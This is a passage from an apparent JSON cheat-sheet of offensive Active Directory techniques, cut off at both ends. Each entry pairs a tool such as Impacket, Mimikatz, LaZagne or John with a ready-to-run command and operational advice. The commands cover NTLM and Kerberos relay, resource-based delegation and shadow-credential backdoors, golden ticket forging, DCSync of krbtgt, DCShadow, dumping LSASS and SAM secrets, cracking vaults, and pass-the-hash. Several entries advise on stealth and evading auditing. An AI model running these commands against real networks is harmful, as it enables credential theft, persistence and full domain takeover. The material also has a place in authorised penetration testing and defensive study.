john","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-Interactive","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-Interactive","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Lateral Movement","Collection","Execution"],"nativeCategory":["Lateral Movement","Collection","Exploitation"],"command":"# Relay to SMB and open an interactive client shell\npython3 ntlmrelayx.py -t smb://10.10.10.1 -smb2support -i\n# In another terminal, connect to the spawned session\nnc 127.0.0.1 11000","description":"Impacket's ntlmrelayx.py can hold a relayed SMB session open and expose it as an interactive client rather than running a single command. With -i (--interactive), each successful relay spawns an interactive SMB shell bound to a local TCP port (starting at 11000); connect to it with netcat to browse shares, upload/download files, and read data as the relayed user. This is useful when you want hands-on access to the target's filesystem instead of blind command execution, and pairs with a coercion primitive (PetitPotam, printerbug, dementor) to feed authentications into the relay.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tLocal interactive port: 11000","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-RBCD","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-RBCD","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Relay coerced machine auth to LDAPS and configure RBCD on the victim object\n# (auto-creates a computer account to delegate from when you hold MachineAccountQuota)\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --delegate-access","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication from a victim computer to LDAPS on the Domain Controller. With --delegate-access it writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the relayed computer object, granting an attacker-controlled account Resource-Based Constrained Delegation (RBCD) over it. After the relay, getST.py can request a Service Ticket impersonating any user (including a Domain Admin) to the victim. This requires an account to delegate to (create one first with --add-computer or Impacket's addcomputer.py) and a coercion primitive such as PetitPotam or the printer bug to force the victim's machine account to authenticate. LDAPS is preferred because RBCD writes require a channel not protected by LDAP signing.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tAttacker computer account: ATTACKER$","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-ShadowCredentials","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-ShadowCredentials","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Execution"],"nativeCategory":["Persistence","Credential Access","Exploitation"],"command":"# Add a Key Credential to the target account via relayed write access\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --shadow-credentials --shadow-target 'DC01$'","description":"Impacket's ntlmrelayx.py relays authentication to LDAP/LDAPS and, with --shadow-credentials, performs a Shadow Credentials attack by writing a new Key Credential into the target's msDS-KeyCredentialLink attribute. This adds an attacker-controlled certificate/key pair to the account, allowing later PKINIT authentication to obtain a TGT (and the account's NT hash via UnPAC-the-hash) without changing its password. --shadow-target selects which principal to backdoor; the relayed identity must have write access (GenericWrite/GenericAll) to that object. The attack requires the domain to support Key Trust (a KDC with PKINIT, i.e. an AD CS PKI or Server 2016+). ntlmrelayx saves the generated certificate so you can authenticate with it afterwards using gettgtpkinit.py or PKINITtools.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tShadow target account: DC01$","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true},{"id":"wadcoms:Impacket-owneredit","toolId":"wadcoms:Impacket-owneredit","toolName":"Impacket-owneredit","name":"Impacket-owneredit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Set john as the owner of the victim object\nowneredit.py -action 'write' -new-owner 'john' -target 'victim' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's owneredit.py reads or changes the owner set in an object's security descriptor over LDAP. Because the owner has implicit WriteDacl, `-action write -new-owner` lets you seize ownership of a target you hold WriteOwner over, then combine it with dacledit.py to grant yourself full control. Use `-action read` first to record the original owner for cleanup. Together owneredit + dacledit reproduce the WriteOwner-to-takeover chain on Linux.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew owner: john\n\n\tTarget object: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:Impacket-RaiseChild","toolId":"wadcoms:Impacket-raiseChild","toolName":"Impacket-raiseChild","name":"Impacket-RaiseChild","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Escalate from child-domain admin to forest root via ExtraSid golden ticket\nraiseChild.py test.local/john:password123","description":"Impacket raiseChild.py automates child-domain-to-forest-root privilege escalation by abusing the intra-forest trust. Given Domain Admin credentials in a child domain it DCSyncs the child krbtgt, forges a golden ticket with an Enterprise Admins ExtraSid from the forest root, and uses it to compromise the parent, optionally executing a command on the root DC. Requires child-domain administrative credentials.\n\nCommand Reference:\n\n\tChild domain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"],"added":true},{"id":"wadcoms:Impacket-TicketConverter","toolId":"wadcoms:Impacket-ticketConverter","toolName":"Impacket-ticketConverter","name":"Impacket-TicketConverter","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Defense Evasion"],"nativeCategory":["Collection","Defense Evasion"],"command":"# kirbi -> ccache (for Impacket)\nticketConverter.py ticket.kirbi out.ccache\n\n# ccache -> kirbi (for Rubeus/Mimikatz)\nticketConverter.py out.ccache ticket.kirbi","description":"Impacket ticketConverter.py converts between the .kirbi format (used by Mimikatz and Rubeus) and the .ccache format (used by Impacket and MIT Kerberos), in either direction, based on the input file extension. This bridges Windows and Linux tooling: dump a TGT with Rubeus, convert it, and reuse it from an Impacket workflow (or vice versa). It performs no network activity.\n\nCommand Reference:\n\n\tInput ticket: ticket.kirbi\n\n\tOutput ticket: out.ccache","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Impacket-Ticketer-AES","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-Ticketer-AES","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES golden ticket -> administrator.ccache\nticketer.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92 -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local administrator\n\n# Use it\nexport KRB5CCNAME=administrator.ccache","description":"Impacket ticketer.py forges golden (or silver) tickets offline; supplying -aesKey signs the ticket with the krbtgt AES256 key instead of the RC4/NT hash, producing an AES-encrypted TGT that blends in with modern Kerberos traffic. The resulting .ccache can be exported to KRB5CCNAME and used by any Impacket tool for pass-the-ticket. Requires the krbtgt AES key and the domain SID.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tDomain: test.local\n\n\tTarget user: administrator","mitre":["T1558.001"],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true},{"id":"wadcoms:John-keepass2john","toolId":"wadcoms:John","toolName":"John","name":"John-keepass2john","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the master-key hash from the .kdbx\nkeepass2john Database.kdbx > hashes.txt\n\n# crack the master password\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"KeePass databases (.kdbx) looted from a share or a compromised host are frequent sources of privileged credentials. John the Ripper's keepass2john helper converts the database master-key parameters into a crackable hash, which john then attacks with a wordlist. It handles both password-only and keyfile-protected databases (pass the keyfile with -k). Fully offline; a recovered master password opens every secret in the vault.\n\nCommand Reference:\n\n\tKeePass DB: Database.kdbx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1555.005"],"requires":["No_Creds"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/"],"added":true},{"id":"wadcoms:John-pfx2john","toolId":"wadcoms:John","toolName":"John","name":"John-pfx2john","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the crackable hash from the .pfx\npfx2john cert.pfx > hashes.txt\n\n# crack the passphrase (john auto-detects the pfx format)\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"A password-protected PKCS#12 certificate store (.pfx / .p12) recovered during collection can be opened offline. John the Ripper's pfx2john helper extracts the encryption parameters into a crackable hash, which john then brute-forces against a wordlist. Recovering the passphrase unlocks the private key and certificate, which can be used for PKINIT/Schannel authentication (e.g. via certipy or Rubeus). Runs entirely offline with no target interaction.\n\nCommand Reference:\n\n\tPFX File: cert.pfx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["No_Creds"],"services":["ADCS"],"references":["https://github.com/openwall/john","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"added":true},{"id":"wadcoms:JuicyPotatoNG-SeImpersonate","toolId":"wadcoms:JuicyPotatoNG","toolName":"JuicyPotatoNG","name":"JuicyPotatoNG-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -t * tries both token-creation APIs, -l sets the local COM server port\nJuicyPotatoNG.exe -t * -p \"C:\\Windows\\System32\\cmd.exe\" -a \"/c whoami\" -l 9999","description":"JuicyPotatoNG revives the JuicyPotato DCOM abuse against modern Windows by using a specific CLSID and a local COM server on a non-default port to coerce a SYSTEM authentication, then impersonates the token. The -t flag selects the token API: 't' uses CreateProcessWithTokenW (needs SeImpersonatePrivilege), 'u' uses CreateProcessAsUserW (needs SeAssignPrimaryTokenPrivilege), and '*' tries both. It works on Windows 10 / Server 2019 and later where classic JuicyPotato was blocked. Requires SeImpersonate or SeAssignPrimaryToken on the service account.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tCOM listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"added":true},{"id":"wadcoms:Krbrelayx-Unconstrained-TGT","toolId":"wadcoms:Krbrelayx","toolName":"Krbrelayx","name":"Krbrelayx-Unconstrained-TGT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation","Execution"],"nativeCategory":["Credential Access","PrivEsc","Exploitation"],"command":"# Export mode: capture forwarded TGTs using the unconstrained account's key\npython3 krbrelayx.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92\n# Then coerce dc.test.local to authenticate (PetitPotam/printerbug) to drop a TGT ccache","description":"krbrelayx.py by dirkjanm abuses Kerberos unconstrained delegation. When you control an account or computer configured with unconstrained delegation, any principal that authenticates to it via Kerberos forwards a usable TGT inside the ticket. Running krbrelayx.py with the account's key (AES key or NT hash) and no relay target puts it in export mode: it starts an SMB/HTTP listener, decrypts incoming Kerberos service tickets, and writes the embedded TGTs to ccache files on disk. Coercing a Domain Controller (via PetitPotam or the printer bug) to authenticate yields the DC's TGT, which can then be used with secretsdump.py for a full DCSync. This is the Kerberos analogue to NTLM relaying and bypasses SMB signing.\n\nCommand Reference:\n\n\tDelegation account AES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain Controller IP: 10.10.10.1\n\n\tOutput ccache: out.ccache","mitre":[],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"added":true},{"id":"wadcoms:LaZagne-All","toolId":"wadcoms:LaZagne","toolName":"LaZagne","name":"LaZagne-All","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"laZagne.exe all","description":"LaZagne is an open-source credential harvester that walks dozens of local software modules - browsers, mail clients, Wi-Fi, LSA secrets, credential vaults, chats, databases, and more - and recovers stored passwords in one pass. The 'all' argument runs every module; results can be written to file with -oN (json), -oA (all formats), or -oJ. Some modules (LSA secrets, Wi-Fi) need administrator rights while browser and app creds are readable in the user's own context, making it a fast triage tool after initial access.\n\nCommand Reference:\n\n\tTarget host: local (current user context)","mitre":["T1555"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"added":true},{"id":"wadcoms:ldapdomaindump-Enum","toolId":"wadcoms:ldapdomaindump","toolName":"ldapdomaindump","name":"ldapdomaindump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Dump all domain objects (users, groups, computers, policy, trusts) to HTML/JSON/greppable files\nldapdomaindump -u 'test.local\\john' -p password123 -o output_dir ldap://10.10.10.1","description":"ldapdomaindump (dirkjanm) authenticates to a Domain Controller over LDAP/LDAPS with any valid domain account and dumps the whole directory - users, groups, computers, domain policy, and trusts - into ready-to-read HTML tables plus machine-parsable JSON and greppable text. It is a fast first-pass inventory when you land your first set of credentials and want an offline overview of the domain before running heavier tooling. Output lands in the directory given with -o (default: current dir).\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:ldapnomnom-UserEnum","toolId":"wadcoms:ldapnomnom","toolName":"ldapnomnom","name":"ldapnomnom-UserEnum","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Anonymous, lockout-free username validation via cLDAP LDAP Ping; DCs auto-discovered from DNS\nldapnomnom --input usernames.txt --output output.txt --dnsdomain test.local","description":"ldapnomnom (lkarlslund) anonymously bruteforces valid Active Directory usernames at very high speed by abusing cLDAP LDAP Ping (Netlogon) requests against Domain Controllers. Because a valid name produces a different response than an invalid one, existence can be confirmed without authenticating - so there are no failed logons and no account lockouts, making it far quieter than Kerberos pre-auth enumeration. Feed it a wordlist with --input and it writes the valid names to --output; --dnsdomain lets it auto-discover DCs via DNS. Ideal for pre-credential recon.\n\nCommand Reference:\n\n\tNo_Creds\n\tUsername wordlist: usernames.txt\n\tOutput file: output.txt\n\tDomain: test.local","mitre":["T1087.002"],"requires":["No_Creds"],"services":["LDAP","Kerberos"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:ldeep-Enum-All","toolId":"wadcoms:ldeep","toolName":"ldeep","name":"ldeep-Enum-All","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Collect everything into files prefixed 'output' (output_users.json, output_groups.json, ...)\nldeep ldap -u john -p password123 -d test.local -s ldap://10.10.10.1 all output","description":"ldeep is an in-depth LDAP enumeration utility that ships dozens of focused subcommands (users, groups, memberships, trusts, GPOs, delegation, PSOs, and more) under its ldap mode. The all subcommand collects computers, domain_policy, zones, gpo, groups, ou, users, trusts and pso in one pass and writes each to files prefixed with the base name you supply. Run it with any valid domain account when you want a complete, structured snapshot of the directory to grep offline. Individual subcommands (e.g. ldeep ldap ... trusts) can be run afterward for targeted queries.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:MANSPIDER-Content-Search","toolId":"wadcoms:MANSPIDER","toolName":"MANSPIDER","name":"MANSPIDER-Content-Search","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Credential Access","Discovery"],"nativeCategory":["Collection","Credential Access","Discovery"],"command":"# Search file CONTENT for 'password' across all readable shares on a host\nmanspider 10.10.10.1 -c password -u john -p password123 -d test.local\n\n# Hunt spreadsheets/office docs mentioning credentials, content-only (no download)\nmanspider 10.10.10.1 -c passw creds -e xlsx docx csv -n -u john -p password123 -d test.local","description":"MANSPIDER (Black Lantern Security) crawls readable SMB shares across one or many hosts and greps inside the files it finds, so it catches secrets buried in documents, spreadsheets and text files rather than just interesting filenames. -c/--content takes one or more regexes matched against extracted file contents (it can parse PDF, Office and other formats), while -f/--filenames and -e/--extensions narrow the crawl by name or type. It downloads matching files to the loot directory by default; add -n/--no-download for a quieter content-only sweep. Useful for wide domain-scale secret hunting once you hold any domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"added":true},{"id":"wadcoms:Mimikatz-Crypto-ExportCerts","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-Crypto-ExportCerts","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"mimikatz.exe \"crypto::capi\" \"privilege::debug\" \"crypto::cng\" \"crypto::certificates /systemstore:LOCAL_MACHINE /store:My /export\" exit","description":"Mimikatz crypto::certificates lists and, with /export, extracts certificates and their private keys from a CryptoAPI store to .pfx/.der files, even when the private key was marked non-exportable. crypto::capi (and crypto::cng for CNG keys) patches the key-provider in memory first so the non-exportable flag is bypassed. Point /systemstore at LOCAL_MACHINE for machine certs or CURRENT_USER for user certs; exported .pfx files enable certificate-based (PKINIT) authentication as that principal.\n\nCommand Reference:\n\n\tStore: LOCAL_MACHINE\\My\n\n\tExport password: mimikatz (default for exported .pfx)","mitre":["T1552.004"],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/"],"added":true},{"id":"wadcoms:Mimikatz-DCShadow","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCShadow","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion"],"nativeCategory":["Persistence","Defense Evasion"],"command":"# Instance 1 (SYSTEM) - stage the change\nmimikatz.exe \"!+\" \"!processtoken\" \"lsadump::dcshadow /object:john /attribute:primaryGroupID /value:512\"\n\n# Instance 2 (Domain Admin) - push the replication\nmimikatz.exe \"lsadump::dcshadow /push\" exit","description":"Mimikatz lsadump::dcshadow temporarily registers a rogue domain controller and pushes attacker-chosen attribute changes into the directory through legitimate replication (MS-DRSR), which sidesteps normal object-modification auditing. It runs as two cooperating instances: an elevated SYSTEM instance stages the change with /object, /attribute and /value, and a second instance holding Domain Admin (or the required replication rights) triggers the push with /push. Use it for stealthy persistence such as writing a primaryGroupID or SIDHistory.\n\nCommand Reference:\n\n\tTarget object: john\n\n\tAttribute: primaryGroupID = 512 (Domain Admins)","mitre":[],"requires":["Shell"],"services":["LDAP","RPC"],"references":["https://github.com/gentilkiwi/mimikatz","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow"],"added":true},{"id":"wadcoms:Mimikatz-DCSync-Krbtgt","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCSync-Krbtgt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"mimikatz.exe \"privilege::debug\" \"lsadump::dcsync /domain:test.local /user:krbtgt\" exit","description":"Mimikatz lsadump::dcsync impersonates a domain controller and uses the MS-DRSR replication protocol (GetNCChanges) to pull the password data of a chosen account from a live DC, without ever running code on that DC or touching NTDS.dit on disk. Targeting krbtgt yields the KDC key needed to forge Golden Tickets. It requires an account with the Replicating Directory Changes / Replicating Directory Changes All rights (Domain Admins, Enterprise Admins, or a delegated principal).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tTarget user: krbtgt","mitre":["T1003.006"],"requires":["Shell"],"services":["Kerberos","LDAP"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/"],"added":true},{"id":"wadcoms:Mimikatz-DPAPI-Masterkey-Cred","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DPAPI-Masterkey-Cred","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"dpapi::masterkey /in:\\\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1339291983-1349129144-367733775-1001\\<GUID>\\\" /sid:S-1-5-21-1339291983-1349129144-367733775-1001 /password:password123\" \"dpapi::cred /in:\\\"%appdata%\\Microsoft\\Credentials\\<GUID>\\\"\" exit","description":"Mimikatz dpapi::masterkey decrypts a user's DPAPI master key from the Protect folder using their password (and SID), and dpapi::cred then uses that cached master key to decrypt a Credential blob into its stored plaintext secret. DPAPI protects saved RDP, browser, scheduled-task, and Credential Manager secrets, so this chain recovers them offline from copied files. If you lack the user's password, dpapi::masterkey /rpc asks the domain controller to decrypt the key with the domain DPAPI backup key.\n\nCommand Reference:\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tPassword: password123","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true},{"id":"wadcoms:Mimikatz-LogonPasswords","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LogonPasswords","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit","description":"Mimikatz sekurlsa::logonpasswords reads the authentication material cached in LSASS memory and reconstructs plaintext passwords, NT/LM hashes, and Kerberos keys for every interactive, service, and network logon session on the host. It requires local administrator rights and SeDebugPrivilege, which privilege::debug enables before touching LSASS. This is the classic loud credential dump; on hardened hosts (Credential Guard, PPL, or EDR hooking LSASS) it will fail or be caught, so prefer an offline minidump plus pypykatz when OPSEC matters.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tPrivilege: SeDebugPrivilege","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:Mimikatz-LsadumpSAM","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSAM","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" exit","description":"Mimikatz lsadump::sam decrypts the local SAM database using the boot key from the SYSTEM hive and dumps the NT hashes of all local accounts, including the local Administrator. Running it live requires SYSTEM-level access, so token::elevate is used to raise from an administrative shell to SYSTEM. The recovered local hashes are ideal for local pass-the-hash and for spotting password reuse across a fleet where the same local admin hash is shared.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SAM + SYSTEM)","mitre":["T1003.002"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/"],"added":true},{"id":"wadcoms:Mimikatz-LsadumpSecrets","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSecrets","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::secrets\" exit","description":"Mimikatz lsadump::secrets decrypts the LSA secrets stored under the SECURITY registry hive, exposing service account passwords, scheduled-task credentials, cached DPAPI machine keys, auto-logon passwords, and the machine account secret in cleartext. It needs SYSTEM rights, so token::elevate is chained after privilege::debug. LSA secrets frequently hand over a domain service account password that no other technique reveals.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SECURITY + SYSTEM)","mitre":["T1003.004"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/004/"],"added":true},{"id":"wadcoms:Mimikatz-PassTheHash","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:john /domain:test.local /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 /run:cmd.exe\" exit","description":"Mimikatz sekurlsa::pth performs pass-the-hash by starting a new process whose logon session is seeded with a supplied NT hash (or AES key), letting network authentication proceed as the target user without knowing their password. The spawned process (here cmd.exe) can then reach SMB, WMI, or WinRM as john. It requires local administrator rights on the box you run it from because it patches the new process's LSASS session; use /aes256 instead of /ntlm for an overpass-the-hash that requests Kerberos tickets.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":["T1550.002"],"requires":["Shell","Hash"],"services":["NTLM","SMB","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/"],"added":true},{"id":"wadcoms:Mimikatz-PassTheTicket","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"kerberos::ptt ticket.kirbi\" exit","description":"Mimikatz kerberos::ptt injects a Kerberos ticket (.kirbi TGT or TGS) directly into the current logon session's ticket cache, so subsequent tools authenticate with it transparently. Unlike sekurlsa::pth it does not spawn a process or need administrator rights, since it only writes to the caller's own cache. Use it to replay a harvested or forged ticket for pass-the-ticket lateral movement, then verify with klist.\n\nCommand Reference:\n\n\tTicket file: 